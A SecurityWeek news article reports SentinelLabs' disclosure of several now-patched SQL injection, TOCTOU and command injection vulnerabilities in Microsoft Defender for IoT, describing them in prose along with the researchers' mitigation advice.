Connect with us

Hi, what are you looking for?



Critical Vulnerabilities Found in Microsoft Defender for IoT

Researchers at endpoint security firm SentinelOne on Monday published detailed information on a couple of critical remote code execution vulnerabilities discovered in Microsoft Defender for IoT.

Researchers at endpoint security firm SentinelOne on Monday published detailed information on a couple of critical remote code execution vulnerabilities discovered in Microsoft Defender for IoT.

Designed with continuous network detection and response (NDR) capabilities, Defender for IoT supports various IoT, OT, and industrial control system (ICS) devices, and can be deployed both on-premises and in the cloud.

Tracked as CVE-2021-42311 and CVE-2021-42313, the two critical bugs have a CVSS score of 10 and were addressed by Microsoft with its December 2021 Patch Tuesday updates.

Both are SQL injection vulnerabilities that a remote attacker could exploit without authentication to achieve arbitrary code execution.

Identified in the token validation process, CVE-2021-42313 exists because the UUID parameter isn’t sanitized, SentinelLabs explains.

[ READ: Microsoft Patches for 51 Windows Security Defects ]

The researchers say the vulnerability allowed them to “insert, update, and execute SQL special commands.” They came up with proof-of-concept (PoC) code that exploits the bug to extract a logged-in user session ID from the database, which leads to complete account takeover.

Advertisement. Scroll to continue reading.

Also related to the token validation process, albeit performed by a different function, CVE-2021-42311 exists because an API token used for verification is shared across Defender for IoT installations.

SentinelLabs reported the critical vulnerabilities to Microsoft in June 2021 along with three other issues – two high-severity flaws in Microsoft Defender for IoT (CVE-2021-42312 and CVE-2021-42310) and a vulnerability in the RCDCAP open source project (CVE-2021-37222).

CVE-2021-42310, SentinelLabs explains, is related to the password recovery mechanism of the Azure portal, which consists of a Python web API and a Java web API, which is prone to a time-of-check-time-of-use (TOCTOU) vulnerability.

[ READ: Patch Tuesday: Microsoft Calls Attention to ‘Wormable’ Windows Flaw ]

The mechanism uses a signed password reset ZIP file that the user needs to upload on the password reset page. Due to the security bug, however, it was possible to use the signed ZIP file from a different user to create a ZIP file containing a malicious JSON.

The attack could be used to obtain the password for the privileged user cyberx (Microsoft acquired CyberX in 2020 and built Defender for IoT on their product), which could result in the execution of code with root privileges.

This led the researchers to the discovery of a simple command injection issue impacting the change password mechanism, which was addressed as part of CVE-2021-42312.

“While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched, and checking access logs for irregularities,” SentinelLabs notes.

Related: Microsoft Teams Abused for Malware Distribution in Recent Attacks

Related: Microsoft Urges Customers to Patch Recent Active Directory Vulnerabilities

Related: Microsoft Patches 67 Security Flaws, Including Zero-Day Exploited by Emotet

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...


The latest Chrome update brings patches for eight vulnerabilities, including seven reported by external researchers.


Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.


Apple has released updates for macOS, iOS and Safari and they all include a WebKit patch for a zero-day vulnerability tracked as CVE-2023-23529.

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...

IoT Security

A vulnerability affecting Dahua cameras and video recorders can be exploited by threat actors to modify a device’s system time.